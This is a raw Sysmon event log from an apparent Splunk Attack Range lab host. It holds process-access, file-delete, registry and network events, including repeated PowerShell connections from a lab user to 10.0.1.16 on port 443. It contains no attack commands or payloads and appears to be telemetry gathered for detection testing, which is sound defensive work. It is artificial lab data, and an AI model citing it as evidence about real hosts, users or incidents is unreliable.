13:14:37.898{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496866Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:37.898{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A03D-6140-6B56-04000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:37.898{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A03D-6140-6B56-04000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
23542300x800000000000000036496940Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:06.853{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E33E2F101B30507B92F2B703B2DCD44F,SHA256=F29044C936DB9E5902C27E7A7CF9AA6D8B581B81009F8C9320F5F7FD22E236ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496939Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:35.570{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50479-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036496949Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:07.989{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A05B-6140-6E56-04000000C801}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496948Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:07.973{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496947Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:07.973{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496946Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:07.973{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496945Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:07.973{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496944Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:07.973{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A05B-6140-6E56-04000000C801}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496943Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:07.973{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A05B-6140-6E56-04000000C801}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496942Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:07.968{B81B27B7-A05B-6140-6E56-04000000C801}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496941Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:07.905{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD730C26B838EAA8822A665927BE9587,SHA256=4B51008F0AD535876391906BCB17605A3CD5A8892D1926941B3CB09357818845,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496962Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.989{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECF008A786C0E164F6AA5160EA3BE716,SHA256=990D1DBC48F93AAE853129C21E7C50DBD033BE503C32C74062DE533AA6CFCC24,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496961Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.989{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFA0E93C222C766D6E699F3C0ECD7C08,SHA256=8256191867459DF289EA222FAC916B26B143EA1188D63A63249430055EF1F952,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496960Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.920{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42E0CD21D7ABDB35EBD5C2B282AA1C84,SHA256=FF586ED075D201A51B75C85DB67A23A854D4E82CAFCD026CC1DBE278D71B5343,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496959Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.670{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A05C-6140-6F56-04000000C801}1740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496958Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:08.669{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496957Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.669{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496956Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:08.668{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496955Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.668{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496954Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:08.668{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A05C-6140-6F56-04000000C801}1740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496953Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.668{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A05C-6140-6F56-04000000C801}1740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496952Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.652{B81B27B7-A05C-6140-6F56-04000000C801}1740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036496951Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.688{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50480-false10.0.1.12-8000- 10341000x800000000000000036496950Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.170{B81B27B7-A05B-6140-6E56-04000000C801}54486660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496963Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:09.934{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=034F478B57941DED869935E560019BF2,SHA256=AC0D44B42CE44137C80FFF7D9514968D038536B1597B42689489E1315CA29CAC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496966Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:10.967{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36DA9703BBF05FAFF643EECBE9FA9A22,SHA256=ACAB8BFF0C3086A066793DA70F6C8F0E57AED3DEC3B425E32930D00FEAB8A96D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496965Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:40.571{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50481-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:10.118{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5CFC2584E7697EDB616D42B43F7742C1,SHA256=46132C3A38983D0984AFD726EDB93A20B6D6DAAD9B02AF011D358563F5AE0AD4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496967Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:11.985{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=233C06D9DF1CC7D95090C04446F5C718,SHA256=89C45B58CE53BE81D389DC8175F3D5DED56D851E25BB9CEAF0A456EDF807D007,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496969Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:42.931{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50482-false10.0.1.12-8000- 23542300x800000000000000036496968Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:13.031{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75180E5CDB978BA6BC85A9A5EF38173E,SHA256=989364E7466E777548DCF64C57774E74871BEE811E61133F50F53F44F791A314,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496970Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:14.046{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64DC80AC3D3EF8BA5092E9268095BB9F,SHA256=ADE0A96DD94A60DDFDEA113FCD36DFEBFA6B7D28F590AAA09BCA8F20206A59EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496983Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:45.581{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50483-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 13241300x800000000000000036496982Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000036496981Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x8a30c771) 13241300x800000000000000036496980Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 